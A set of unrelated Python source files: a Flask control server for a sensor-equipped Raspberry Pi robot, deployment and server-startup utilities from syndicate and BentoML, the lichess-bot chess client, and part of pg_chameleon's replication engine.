with certs {} and key {}".format(str(self.certificate.cert_path), str(self.certificate.key_path)), flush=True) app.run(host="0.0.0.0", port=self.port, ssl_context=(str(self.certificate.cert_path), str(self.certificate.key_path)))
main.py
import threading from time import sleep, time from math import radians, degrees, atan2, sin, cos, sqrt import serial from flask import Flask, request from flask_restful import Api, Resource, reqparse import pigpio from BlindBot.driver import Omni3Wheel from BlindBot.gps import GPS from BlindBot.sonar import Sonar from MPU9250.mpu9250 import MPU9250 from PyYDLidar.PyYDLidar import LaserScan, YDLidarX4 app = Flask(__name__) api = Api(app) sleep(10) # @app.before_first_request # def initialize(): # pass class Robot: def __init__(self): self.pi = pigpio.pi() self._isRunning = False self._thread_buzzer = threading.Thread(target=self._func_buzzer) self._buzzer_freq = 0.0 self._thread_drive = threading.Thread(target=self._func_drive) self._drive_speed = [0.0, 0.0, 0.0] self._thread_gps_ultra = threading.Thread(target=self._func_gps_ultra) self._gps_isOk = False self._gps_location = None self._range_ultra = 0.0 self._thread_imu = threading.Thread(target=self._func_imu) self._imu_head = 0.0 self._thread_control = threading.Thread(target=self._func_control) self._control_flag = False self._target_head = 0.0 self._target_speed = 0.0 self._target_dist = 0.0 self._thread_lidar = threading.Thread(target=self._func_lidar) self._lidar_detect = [0, 0, 0] self._ultra_buzzer_enable = True self._ultra_threshold_stop = 150 # cm self._ultra_sound_freq = 0.85 # % 0.0 -> 1.0 self._lidar_enable = False self._threshold_side = 0.5 self._threshold_front = 0.7 self._speed = 0.2 def run(self): self._isRunning = True self._thread_buzzer.start() self._buzzer_freq = 0.95 sleep(0.5) self._buzzer_freq = 0 self._thread_drive.start() self._thread_gps_ultra.start() self._thread_imu.start() self._thread_control.start() self._thread_lidar.start() def stop(self): self._isRunning = False self._control_flag = False def _func_buzzer(self): buzzState = False buzz_pin = 23 while self._isRunning: self._buzzer_freq = max(0, min(1.0, self._buzzer_freq)) if self._buzzer_freq <= 0.03: buzzState = False self.pi.write(buzz_pin, buzzState) sleep(0.25) elif self._buzzer_freq >= 0.97: buzzState = True self.pi.write(buzz_pin, buzzState) sleep(0.25) else: buzzState = not buzzState self.pi.write(buzz_pin, buzzState) sleep(1.0-1.0*self._buzzer_freq) self.pi.write(buzz_pin, 0) def _func_drive(self): base = Omni3Wheel(self.pi, (13, 6, 5), (19, 26, 21), (12, 16, 20), 0.05, 0.15, (0.1, 0.1, 0.1)) while self._isRunning: base.drive(self._drive_speed) sleep(0.1) base.drive((0, 0, 0)) def _func_gps_ultra(self): gps = GPS("/dev/ttyS0") sonar_trig = 27 sonar_echo = 22 sonar = Sonar(self.pi, sonar_trig, sonar_echo) while self._isRunning: self._range_ultra = sonar.getDist() lat, lon = gps.read_GPS() if lat == 0 or lon == 0: self._gps_isOk = False continue self._gps_isOk = True if self._gps_location == None: self._gps_location = [lat, lon] else: self._gps_location[0] = lat * 0.5 + self._gps_location[0]*0.5 self._gps_location[1] = lon * 0.5 + self._gps_location[1]*0.5 # print(self._gps_location) sonar.cancel() def _func_imu(self): imu = MPU9250() imu.initMPU9250() imu.initAK8963() last_data = time() _roll = None _pitch = None _yaw = None while self._isRunning: accel = imu.data_accel gyro = imu.data_gyro mag = imu.data_mag pitch = atan2(accel[1], sqrt( (accel[0]*accel[0])+(accel[2]*accel[2]))) roll = atan2(-accel[0], sqrt((accel[1]*accel[1]) + (accel[2]*accel[2]))) current_data = time() dt = current_data - last_data last_data = current_data if _roll == None: _roll = roll if _pitch == None: _pitch = pitch _roll = 0.85*(_roll+gyro[0]*dt) + 0.1*_roll + 0.05*roll _pitch = 0.85*(_pitch+gyro[1]*dt) + 0.1*_pitch + 0.05*roll Yh = (mag[1] * cos(_roll)) - (mag[2]*sin(_roll)) Xh = (mag[0] * cos(_pitch)) + (mag[1] * sin(_roll) * sin(_pitch)) + (mag[2] * cos(roll)*sin(_pitch)) _yaw = atan2(Yh, Xh) self._imu_head = degrees(_yaw) # print(self._imu_head) sleep(0.01) def _func_lidar(self): self._lidar_detect = [0, 0, 0] lidar = YDLidarX4("/dev/ttyLidar") lidar.startScanning() sleep(3) gen = lidar.getScanData() while self._isRunning: dF = [[], [], []] for point in next(gen): if point.dist > 0.05: p_ang = round(degrees(point.angle)) + 180 if p_ang > 35 and p_ang < 95: dF[0].append(point.dist) elif p_ang > 350 or p_ang < 10: dF[1].append(point.dist) elif p_ang > 235 and p_ang < 325: dF[2].append(point.dist) if dF[0] != []: if min(dF[0]) < self._threshold_side: self._lidar_detect[0] = 1 # min(dF[0]) else: self._lidar_detect[0] = 0 if dF[1] != []: # print(dF[1]) if min(dF[1]) < self._threshold_front: self._lidar_detect[1] = 1 # min(dF[1]) else: self._lidar_detect[1] = 0 if dF[2] != []: if min(dF[2]) < self._threshold_side: self._lidar_detect[2] = 1 # min(dF[2]) else: self._lidar_detect[2] = 0 lidar.stopScanning() def _func_control(self): self._control_flag = False while self._isRunning: if self._control_flag: compass_diff = radians( self._target_head+94 - self._imu_head) turn = atan2(sin(compass_diff), cos(compass_diff)) self._speed = self._target_speed vx = self._speed w = max(min(-turn * 1.5, 0.6), -0.6) # print(turn, w) if abs(degrees(turn)) < 15: vx = self._speed vy = 0.0 if self._lidar_enable: if self._lidar_detect[0] and self._lidar_detect[2]: vy = 0.0 elif self._lidar_detect[0]: vy = -0.1 elif self._lidar_detect[2]: vy = 0.1 if self._lidar_detect[1]: vx = 0.0 if self._ultra_buzzer_enable: # print(self._range_ultra) if self._range_ultra > 10 and self._range_ultra < self._ultra_threshold_stop: self._buzzer_freq = self._ultra_sound_freq vx = 0.0 vy = 0.0 w = 0.0 else: self._buzzer_freq = 0.0 self._drive_speed = (vx, vy, w) print(self._lidar_detect) # print(self._drive_speed) # print((vx, vy, w)) sleep(0.05) self._drive_speed = [0, 0, 0] robot = Robot() # Robot Speed robot._speed = 0.2 # % 0.0 -> 1.0 # Ultrasonic and Buzzer robot._ultra_buzzer_enable = True robot._ultra_threshold_stop = 60 # cm robot._ultra_sound_freq = 0.85 # % 0.0 -> 1.0 # Lidar Enable robot._lidar_enable = True robot._threshold_side = 0.5 # m robot._threshold_front = 0.7 # m ####### robot.run() class RobotAPI(Resource): def __init__(self): self.parser = reqparse.RequestParser() self.parser.add_argument('Heading', type=float) self.parser.add_argument('Speed', type=float) self.parser.add_argument('BuzzerFrq', type=float) self.parser.add_argument('DriveSpeed', action='split', type=float) self.parser.add_argument('DriveX', type=float) self.parser.add_argument('DriveY', type=float) super().__init__() def get(self, id=None): if id == 201: ret = { 'GPS': robot._gps_location if robot._gps_isOk else [0, 0] } return ret, 201 elif id == 220: robot._control_flag = False robot._drive_speed = [0, 0, 0] return "OK", 220 # 'Sonar': robot._range_ultra, # 'IMU': degrees(robot.gggg) return "FAIL", 601 def post(self, id): if id == 221: args = self.parser.parse_args() robot._target_head = args['Heading'] robot._target_speed = args['Speed'] robot._control_flag = True return "OK", 221 return None def put(self, id): ret = {} code = 200 if id == "head": args = self.parser.parse_args() if args.get('Head') != None: robot._target_head = args['Head'] robot._control_flag = True elif id == "data": parser.add_argument('TargetHead', type=float) parser.add_argument('TargetDist', type=float) args = parser.parse_args() if args.get('TargetHead') != None: robot._target_head = args['TargetHead'] if args.get('TargetDist') != None: robot._target_dist = args['TargetDist'] code = 609 elif id == "command": args = self.parser.parse_args() if args.get('BuzzerFrq') != None: robot._buzzer_freq = args['BuzzerFrq'] if args.get('DriveSpeed') != None: robot._drive_speed = args['DriveSpeed'] else: if args.get('DriveX') != None: robot._drive_speed[0] = args['DriveX'] if args.get('DriveY') != None: robot._drive_speed[1] = args['DriveY'] robot._control_flag = False code = 610 return ret, code api.add_resource(RobotAPI, '/', '/<int:id>') if __name__ == "__main__": app.run(host="192.168.4.1", debug=False) robot.stop()
helper.py
""" Copyright 2018 EPAM Systems, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import concurrent.futures import datetime import json import os import subprocess import sys from concurrent.futures import ALL_COMPLETED, ThreadPoolExecutor from functools import wraps from threading import Thread from time import time from click import BadParameter from tqdm import tqdm from syndicate.commons.log_helper import get_logger from syndicate.core import CONFIG, CONN from syndicate.core.conf.config_holder import path_resolver from syndicate.core.constants import (ARTIFACTS_FOLDER, BUILD_META_FILE_NAME, DEFAULT_SEP) _LOG = get_logger('syndicate.core.helper') def create_pool(func, args, workers=None, *kwargs): """ Create resources in pool in sub processes. :type args: iterable :type func: func """ executor = ThreadPoolExecutor(workers) if workers else ThreadPoolExecutor() try: futures = [executor.submit(func, i, kwargs) for i in args] concurrent.futures.wait(futures, return_when=ALL_COMPLETED) responses = {} for future in futures: result = future.result() if result: responses.update(result) return responses finally: executor.shutdown(wait=True) def unpack_kwargs(handler_func): """ Decorator for unpack kwargs. :type handler_func: func :param handler_func: function which will be decorated """ @wraps(handler_func) def wrapper(*kwargs): """ Wrapper func.""" return handler_func(**kwargs[0]) return wrapper def exit_on_exception(handler_func): """ Decorator to catch all exceptions and fail stage execution :type handler_func: func :param handler_func: function which will be decorated """ @wraps(handler_func) def wrapper(*args, **kwargs): """ Wrapper func.""" try: return handler_func(*args, **kwargs) except Exception as e: _LOG.error("Error occurred: %s", str(e)) sys.exit(1) return wrapper def prettify_json(obj): return json.dumps(obj, indent=4) def cli_command(handler_func): @wraps(handler_func) def wrapper(*args, **kwargs): status_code = handler_func(*args, **kwargs) if status_code != 0: _LOG.error('Execution is failed') sys.exit(1) return wrapper @cli_command def execute_command_by_path(command, path): return subprocess.call(command, shell=True, cwd=path) @cli_command def execute_command(command): return subprocess.call(command, shell=True) def build_path(*paths): return DEFAULT_SEP.join(paths) def _find_alias_and_replace(some_string): """ Find placeholder for alias in string. If found - replace with alias value. :type some_string: str """ first_index = some_string.index('${') second_index = some_string.index('}') alias_name = some_string[first_index + 2:second_index] res_alias = CONFIG.resolve_alias(alias_name) if not res_alias: raise AssertionError('Can not found alias for {0}'.format(alias_name)) result = ( some_string[:first_index] + res_alias + some_string[ second_index + 1:]) return result def resolve_aliases_for_string(string_value): """ Look for aliases in string. :type string_value: str """ input_string = string_value try: if '${' in string_value: if string_value.count('${') == string_value.count('}'): while True: input_string = _find_alias_and_replace(input_string) else: raise AssertionError('Broken alias in value: {0}.'.format( string_value)) return input_string except ValueError: return input_string def check_required_param(ctx, param, value): if not value: raise BadParameter('Parameter is required') return value def resolve_path_callback(ctx, param, value): if not value: raise BadParameter('Parameter is required') return path_resolver(value) def create_bundle_callback(ctx, param, value): bundle_path = os.path.join(CONFIG.project_path, ARTIFACTS_FOLDER, value) if not os.path.exists(bundle_path): os.makedirs(bundle_path) return value def verify_bundle_callback(ctx, param, value): bundle_path = os.path.join(CONFIG.project_path, ARTIFACTS_FOLDER, value) if not os.path.exists(bundle_path): raise AssertionError("Bundle name does not exist. Please, invoke " "'build_artifacts' command to create a bundle.") return value def verify_meta_bundle_callback(ctx, param, value): bundle_path = os.path.join(CONFIG.project_path, ARTIFACTS_FOLDER, value) build_meta_path = os.path.join(bundle_path, BUILD_META_FILE_NAME) if not os.path.exists(build_meta_path): raise AssertionError( "Bundle name is incorrect. {0} does not exist. Please, invoke " "'package_meta' command to create a file.".format( BUILD_META_FILE_NAME)) return value def write_content_to_file(file_path, file_name, obj): file_name = os.path.join(file_path, file_name) if os.path.exists(file_name): _LOG.warn('{0} already exists'.format(file_name)) else: with open(file_name, 'w') as meta_file: json.dump(obj, meta_file) _LOG.info('{0} file was created.'.format(meta_file.name)) def timeit(handler_func): @wraps(handler_func) def timed(*args, **kwargs): ts = time() result = handler_func(*args, **kwargs) te = time() _LOG.info('Stage %s, elapsed time: %s', handler_func.__name__, str(datetime.timedelta(seconds=te - ts))) return result return timed def execute_parallel_tasks(*fns): threads = [] for fn in fns: t = Thread(target=fn) t.start() threads.append(t) for t in threads: t.join() def handle_futures_progress_bar(futures): kwargs = { 'total': len(futures), 'unit': 'nap', 'leave': True } for _ in tqdm(concurrent.futures.as_completed(futures), **kwargs): pass def check_deploy_name_for_duplicates(func): """ Checks whether output file with specified name already exists. Everywhere this decorator is used the following :param func: :return: """ @wraps(func) def real_wrapper(*args, **kwargs): deploy_name = kwargs.get('deploy_name') bundle_name = kwargs.get('bundle_name') replace_output = kwargs.get('replace_output') if deploy_name and bundle_name and not replace_output: output_file_name = '{}/outputs/{}.json'.format(bundle_name, deploy_name) exists = CONN.s3().is_file_exists( CONFIG.deploy_target_bucket, key=output_file_name) if exists: _LOG.warn('Output file already exists with name {}.' ' If it should be replaced with new one, ' 'use --replace_output flag.'.format( output_file_name)) return return func(*args, **kwargs) return real_wrapper
__init__.py
import logging from typing import NoReturn, Optional from simple_di import skip, sync_container from ..configuration.containers import BentoMLContainer logger = logging.getLogger(__name__) # TODO: def serve( bundle_path_or_tag: str, port: Optional[int] = None, max_batch_size: Optional[int] = None, max_latency: Optional[int] = None, run_with_ngrok: Optional[bool] = None, ): pass def start_dev_server( bundle_path: str, port: Optional[int] = None, mb_max_batch_size: Optional[int] = None, mb_max_latency: Optional[int] = None, run_with_ngrok: Optional[bool] = None, enable_swagger: Optional[bool] = None, timeout: Optional[int] = None, ): BentoMLContainer.bundle_path.set(bundle_path) bento_server = BentoMLContainer.config.bento_server bento_server.port.set(port or skip) bento_server.timeout.set(timeout or skip) bento_server.microbatch.timeout.set(timeout or skip) bento_server.swagger.enabled.set(enable_swagger or skip) bento_server.microbatch.max_batch_size.set(mb_max_batch_size or skip) bento_server.microbatch.max_latency.set(mb_max_latency or skip) BentoMLContainer.prometheus_lock.get() # generate lock before fork BentoMLContainer.forward_port.get() # generate port before fork if run_with_ngrok: from threading import Timer from ..utils.flask_ngrok import start_ngrok thread = Timer(1, start_ngrok, args=(port,)) thread.setDaemon(True) thread.start() import multiprocessing model_server_proc = multiprocessing.Process( target=_start_dev_server, args=(BentoMLContainer,), daemon=True, ) model_server_proc.start() try: _start_dev_proxy(BentoMLContainer) finally: model_server_proc.terminate() def start_prod_server( bundle_path: str, port: Optional[int] = None, workers: Optional[int] = None, timeout: Optional[int] = None, enable_swagger: Optional[bool] = None, mb_max_batch_size: Optional[int] = None, mb_max_latency: Optional[int] = None, microbatch_workers: Optional[int] = None, ): import psutil assert ( psutil.POSIX ), "BentoML API Server production mode only supports POSIX platforms" BentoMLContainer.bundle_path.set(bundle_path) bento_server = BentoMLContainer.config.bento_server bento_server.port.set(port or skip) bento_server.timeout.set(timeout or skip) bento_server.microbatch.timeout.set(timeout or skip) bento_server.workers.set(workers or skip) bento_server.swagger.enabled.set(enable_swagger or skip) bento_server.microbatch.workers.set(microbatch_workers or skip) bento_server.microbatch.max_batch_size.set(mb_max_batch_size or skip) bento_server.microbatch.max_latency.set(mb_max_latency or skip) BentoMLContainer.prometheus_lock.get() # generate lock before fork BentoMLContainer.forward_port.get() # generate port before fork import multiprocessing model_server_job = multiprocessing.Process( target=_start_prod_server, args=(BentoMLContainer,), daemon=True ) model_server_job.start() try: _start_prod_proxy(BentoMLContainer) finally: model_server_job.terminate() def _start_dev_server(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.model_app.get().run() assert False, "not reachable" def _start_dev_proxy(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.proxy_app.get().run() assert False, "not reachable" def _start_prod_server(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.model_server.get().run() assert False, "not reachable" def _start_prod_proxy(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.proxy_server.get().run() assert False, "not reachable"
lichess-bot.py
import argparse import chess from chess.variant import find_variant import chess.polyglot import engine_wrapper import model import json import lichess import logging import multiprocessing import traceback import logging_pool import signal import sys import time import backoff from config import load_config from conversation import Conversation, ChatLine from functools import partial from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError from urllib3.exceptions import ProtocolError from ColorLogger import enable_color_logging logger = logging.getLogger(__name__) try: from http.client import RemoteDisconnected # New in version 3.5: Previously, BadStatusLine('') was raised. except ImportError: from http.client import BadStatusLine as RemoteDisconnected __version__ = "1.1.4" terminated = False def signal_handler(signal, frame): global terminated logger.debug("Recieved SIGINT. Terminating client.") terminated = True signal.signal(signal.SIGINT, signal_handler) def is_final(exception): return isinstance(exception, HTTPError) and exception.response.status_code < 500 def upgrade_account(li): if li.upgrade_to_bot_account() is None: return False logger.info("Succesfully upgraded to Bot Account!") return True @backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final) def watch_control_stream(control_queue, li): response = li.get_event_stream() try: for line in response.iter_lines(): if line: event = json.loads(line.decode('utf-8')) control_queue.put_nowait(event) else: control_queue.put_nowait({"type": "ping"}) except (RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as exception: logger.error("Terminating client due to connection error") traceback.print_exception(type(exception), exception, exception.__traceback__) control_queue.put_nowait({"type": "terminated"}) def start(li, user_profile, engine_factory, config): challenge_config = config["challenge"] max_games = challenge_config.get("concurrency", 1) logger.info("You're now connected to {} and awaiting challenges.".format(config["url"])) manager = multiprocessing.Manager() challenge_queue = manager.list() control_queue = manager.Queue() control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li]) control_stream.start() busy_processes = 0 queued_processes = 0 with logging_pool.LoggingPool(max_games+1) as pool: while not terminated: event = control_queue.get() if event["type"] == "terminated": break elif event["type"] == "local_game_done": busy_processes -= 1 logger.info("+++ Process Free. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes)) elif event["type"] == "challenge": chlng = model.Challenge(event["challenge"]) if chlng.is_supported(challenge_config): challenge_queue.append(chlng) if (challenge_config.get("sort_by", "best") == "best"): list_c = list(challenge_queue) list_c.sort(key=lambda c: -c.score()) challenge_queue = list_c else: try: li.decline_challenge(chlng.id) logger.info(" Decline {}".format(chlng)) except HTTPError as exception: if exception.response.status_code != 404: # ignore missing challenge raise exception elif event["type"] == "gameStart": if queued_processes <= 0: logger.debug("Something went wrong. Game is starting and we don't have a queued process") else: queued_processes -= 1 game_id = event["game"]["id"] pool.apply_async(play_game, [li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue]) busy_processes += 1 logger.info("--- Process Used. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes)) while ((queued_processes + busy_processes) < max_games and challenge_queue): # keep processing the queue until empty or max_games is reached chlng = challenge_queue.pop(0) try: response = li.accept_challenge(chlng.id) logger.info(" Accept {}".format(chlng)) queued_processes += 1 logger.info("--- Process Queue. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes)) except HTTPError as exception: if exception.response.status_code == 404: # ignore missing challenge logger.info(" Skip missing {}".format(chlng)) else: raise exception logger.info("Terminated") control_stream.terminate() control_stream.join() @backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final) def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue): response = li.get_game_stream(game_id) lines = response.iter_lines() #Initial response of stream will be the full game info. Store it game = model.Game(json.loads(next(lines).decode('utf-8')), user_profile["username"], li.baseUrl, config.get("abort_time", 20)) board = setup_board(game) engine = engine_factory(board) conversation = Conversation(game, engine, li, __version__, challenge_queue) logger.info("+++ {}".format(game)) engine_cfg = config["engine"] polyglot_cfg = engine_cfg.get("polyglot", {}) book_cfg = polyglot_cfg.get("book", {}) try: if not polyglot_cfg.get("enabled") or not play_first_book_move(game, engine, board, li, book_cfg): play_first_move(game, engine, board, li) engine.set_time_control(game) for binary_chunk in lines: upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None u_type = upd["type"] if upd else "ping" if u_type == "chatLine": conversation.react(ChatLine(upd), game) elif u_type == "gameState": game.state = upd moves = upd["moves"].split() board = update_board(board, moves[-1]) if not board.is_game_over() and is_engine_move(game, moves): if config.get("fake_think_time") and len(moves) > 9: delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015 accel = 1 - max(0, min(100, len(moves) - 20)) / 150 sleep = min(5, delay * accel) time.sleep(sleep) best_move = None if polyglot_cfg.get("enabled") and len(moves) <= polyglot_cfg.get("max_depth", 8) * 2 - 1: best_move = get_book_move(board, book_cfg) if best_move == None: best_move = engine.search(board, upd["wtime"], upd["btime"], upd["winc"], upd["binc"]) li.make_move(game.id, best_move) game.abort_in(config.get("abort_time", 20)) elif u_type == "ping": if game.should_abort_now(): logger.info(" Aborting {} by lack of activity".format(game.url())) li.abort(game.id) except HTTPError as e: ongoing_games = li.get_ongoing_games() game_over = True for ongoing_game in ongoing_games: if ongoing_game["gameId"] == game.id: game_over = False break if not game_over: logger.warn("Abandoning game due to HTTP "+response.status_code) except (RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as exception: logger.error("Abandoning game due to connection error") traceback.print_exception(type(exception), exception, exception.__traceback__) finally: logger.info("--- {} Game over".format(game.url())) engine.quit() # This can raise queue.NoFull, but that should only happen if we're not processing # events fast enough and in this case I believe the exception should be raised control_queue.put_nowait({"type": "local_game_done"}) def play_first_move(game, engine, board, li): moves = game.state["moves"].split() if is_engine_move(game, moves): # need to hardcode first movetime since Lichess has 30 sec limit. best_move = engine.first_search(board, 10000) li.make_move(game.id, best_move) return True return False def play_first_book_move(game, engine, board, li, config): moves = game.state["moves"].split() if is_engine_move(game, moves): book_move = get_book_move(board, config) if book_move: li.make_move(game.id, book_move) return True else: return play_first_move(game, engine, board, li) return False def get_book_move(board, config): if board.uci_variant == "chess": book = config["standard"] else: if config.get("{}".format(board.uci_variant)): book = config["{}".format(board.uci_variant)] else: return None with chess.polyglot.open_reader(book) as reader: try: selection = config.get("selection", "weighted_random") if selection == "weighted_random": move = reader.weighted_choice(board).move() elif selection == "uniform_random": move = reader.choice(board, config.get("min_weight", 1)).move() elif selection == "best_move": move = reader.find(board, config.get("min_weight", 1)).move() except IndexError: # python-chess raises "IndexError" if no entries found move = None if move is not None: logger.info("Got move {} from book {}".format(move, book)) return move def setup_board(game): if game.variant_name.lower() == "chess960": board = chess.Board(game.initial_fen, chess960=True) elif game.variant_name == "From Position": board = chess.Board(game.initial_fen) else: VariantBoard = find_variant(game.variant_name) board = VariantBoard() moves = game.state["moves"].split() for move in moves: board = update_board(board, move) return board def is_white_to_move(game, moves): return len(moves) % 2 == (0 if game.white_starts else 1) def is_engine_move(game, moves): return game.is_white == is_white_to_move(game, moves) def update_board(board, move): uci_move = chess.Move.from_uci(move) board.push(uci_move) return board def intro(): return r""" . _/| . // o\ . || ._) lichess-bot %s . //__\ . )___( Play on Lichess with a bot """ % __version__ if __name__ == "__main__": parser = argparse.ArgumentParser(description='Play on Lichess with a bot') parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.') parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.') parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)') parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None) args = parser.parse_args() logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile, format="%(asctime)-15s: %(message)s") enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO) logger.info(intro()) CONFIG = load_config(args.config or "./config.yml") li = lichess.Lichess(CONFIG["token"], CONFIG["url"], __version__) user_profile = li.get_profile() username = user_profile["username"] is_bot = user_profile.get("title") == "BOT" logger.info("Welcome {}!".format(username)) if args.u is True and is_bot is False: is_bot = upgrade_account(li) if is_bot: engine_factory = partial(engine_wrapper.create_engine, CONFIG) start(li, user_profile, engine_factory, CONFIG) else: logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
global_lib.py
import rollbar import pprint import yaml import os, os.path import sys import time import signal from shutil import copy from distutils.sysconfig import get_python_lib from tabulate import tabulate from pg_chameleon import pg_engine, mysql_source, pgsql_source import logging from logging.handlers import TimedRotatingFileHandler from daemonize import Daemonize import multiprocessing as mp import traceback from pkg_resources import get_distribution class rollbar_notifier(object): """ This class is used to send messages to rollbar whether the key and environment variables are set """ def __init__(self, rollbar_key, rollbar_env, rollbar_level, logger): """ Class constructor. """ self.levels = { "critical": 1, "error": 2, "warning": 3, "info": 5 } self.rollbar_level = self.levels[rollbar_level] self.logger = logger self.notifier = rollbar if rollbar_key !='' and rollbar_env != '': self.notifier.init(rollbar_key, rollbar_env) else: self.notifier = None def send_message(self, message, level): """ The method sends a message to rollbar. If it fails it just logs an error without causing the process to crash. """ if self.notifier: exc_info = sys.exc_info() try: notification_level = self.levels[level] if notification_level <= self.rollbar_level: try: self.notifier.report_message(message, level) if exc_info[0]: self.notifier.report_exc_info(exc_info) except: self.logger.error("Could not send the message to rollbar.") except: self.logger.error("Wrong rollbar level specified.") class replica_engine(object): """ This class is wraps the the mysql and postgresql engines in order to perform the various activities required for the replica. The constructor inits the global configuration class and setup the mysql and postgresql engines as class objects. The class sets the logging using the configuration parameter. """ def __init__(self, args): """ Class constructor. """ if os.geteuid()==0: print ("pg_chameleon cannot be run as root") sys.exit(10) self.catalog_version = '2.0.9' self.upgradable_version = '1.7' self.lst_yes= ['yes', 'Yes', 'y', 'Y'] python_lib=os.path.dirname(os.path.realpath(__file__)) cham_dir = "%s/.pg_chameleon" % os.path.expanduser('~') local_conf = "%s/configuration/" % cham_dir self.global_conf_example = '%s/../configuration/config-example.yml' % python_lib self.local_conf_example = '%s/config-example.yml' % local_conf local_logs = "%s/logs/" % cham_dir local_pid = "%s/pid/" % cham_dir self.conf_dirs=[ cham_dir, local_conf, local_logs, local_pid, ] self.args = args self.source = self.args.source if self.args.command == 'set_configuration_files': self.set_configuration_files() sys.exit() self.__set_conf_permissions(cham_dir) self.load_config() log_list = self.__init_logger("global") self.logger = log_list[0] self.logger_fds = log_list[1] #notifier configuration self.notifier = rollbar_notifier(self.config["rollbar_key"],self.config["rollbar_env"] , self.args.rollbar_level , self.logger ) #pg_engine instance initialisation self.pg_engine = pg_engine() self.pg_engine.dest_conn = self.config["pg_conn"] self.pg_engine.logger = self.logger self.pg_engine.source = self.args.source self.pg_engine.full = self.args.full self.pg_engine.type_override = self.config["type_override"] self.pg_engine.sources = self.config["sources"] self.pg_engine.notifier = self.notifier #mysql_source instance initialisation self.mysql_source = mysql_source() self.mysql_source.source = self.args.source self.mysql_source.tables = self.args.tables self.mysql_source.schema = self.args.schema.strip() self.mysql_source.pg_engine = self.pg_engine self.mysql_source.logger = self.logger self.mysql_source.sources = self.config["sources"] self.mysql_source.type_override = self.config["type_override"] self.mysql_source.notifier = self.notifier #pgsql_source instance initialisation self.pgsql_source = pgsql_source() self.pgsql_source.source = self.args.source self.pgsql_source.tables = self.args.tables self.pgsql_source.schema = self.args.schema.strip() self.pgsql_source.pg_engine = self.pg_engine self.pgsql_source.logger = self.logger self.pgsql_source.sources = self.config["sources"] self.pgsql_source.type_override = self.config["type_override"] self.pgsql_source.notifier = self.notifier catalog_version = self.pg_engine.get_catalog_version() #safety checks if self.args.command == 'upgrade_replica_schema': self.pg_engine.sources = self.config["sources"] print("WARNING, entering upgrade mode. Disabling the catalogue version's check. Expected version %s, installed version %s" % (self.catalog_version, catalog_version)) elif self.args.command == 'enable_replica' and self.catalog_version != catalog_version: print("WARNING, catalogue mismatch. Expected version %s, installed version %s" % (self.catalog_version, catalog_version)) else: if catalog_version: if self.catalog_version != catalog_version: print("FATAL, replica catalogue version mismatch. Expected %s, got %s" % (self.catalog_version, catalog_version)) sys.exit() if self.args.source != '*' and self.args.command != 'add_source': self.pg_engine.connect_db() source_count = self.pg_engine.check_source() self.pg_engine.disconnect_db() if source_count == 0: print("FATAL, The source %s is not registered. Please add it add_source" % (self.args.source)) sys.exit() def terminate_replica(self, signal, frame): """ Stops gracefully the replica. """ self.logger.info("Caught stop replica signal terminating daemons and ending the replica process.") self.read_daemon.terminate() self.replay_daemon.terminate() self.pg_engine.connect_db() self.pg_engine.set_source_status("stopped") sys.exit(0) def set_configuration_files(self): """ The method loops the list self.conf_dirs creating them only if they are missing. The method checks the freshness of the config-example.yaml and connection-example.yml copies the new version from the python library determined in the class constructor with get_python_lib(). If the configuration file is missing the method copies the file with a different message. """ for confdir in self.conf_dirs: if not os.path.isdir(confdir): print ("creating directory %s" % confdir) os.mkdir(confdir) if os.path.isfile(self.local_conf_example): if os.path.getctime(self.global_conf_example)>os.path.getctime(self.local_conf_example): print ("updating configuration example with %s" % self.local_conf_example) copy(self.global_conf_example, self.local_conf_example) else: print ("copying configuration example in %s" % self.local_conf_example) copy(self.global_conf_example, self.local_conf_example) def load_config(self): """ The method loads the configuration from the file specified in the args.config parameter. """ local_confdir = "%s/.pg_chameleon/configuration/" % os.path.expanduser('~') self.config_file = '%s/%s.yml'%(local_confdir, self.args.config) if not os.path.isfile(self.config_file): print("**FATAL - configuration file missing. Please ensure the file %s is present." % (self.config_file)) sys.exit() config_file = open(self.config_file, 'r') pyyml=str(get_distribution('PyYAML')).split(' ')[1] if pyyml<='3.13': self.config = yaml.load(config_file.read()) else: self.config = yaml.load(config_file.read(), Loader=yaml.FullLoader) config_file.close() def show_sources(self): """ The method shows the sources available in the configuration file. """ for item in self.config["sources"]: print("\n") print (tabulate([], headers=["Source %s" % item])) tab_headers = ['Parameter', 'Value'] tab_body = [] source = self.config["sources"][item] config_list = [param for param in source if param not in ['db_conn']] connection_list = [param for param in source["db_conn"] if param not in ['password']] for parameter in config_list: tab_row = [parameter, source[parameter]] tab_body.append(tab_row) for param in connection_list: tab_row = [param, source["db_conn"][param]] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers)) def show_config(self): """ The method loads the current configuration and displays the status in tabular output """ config_list = [item for item in self.config if item not in 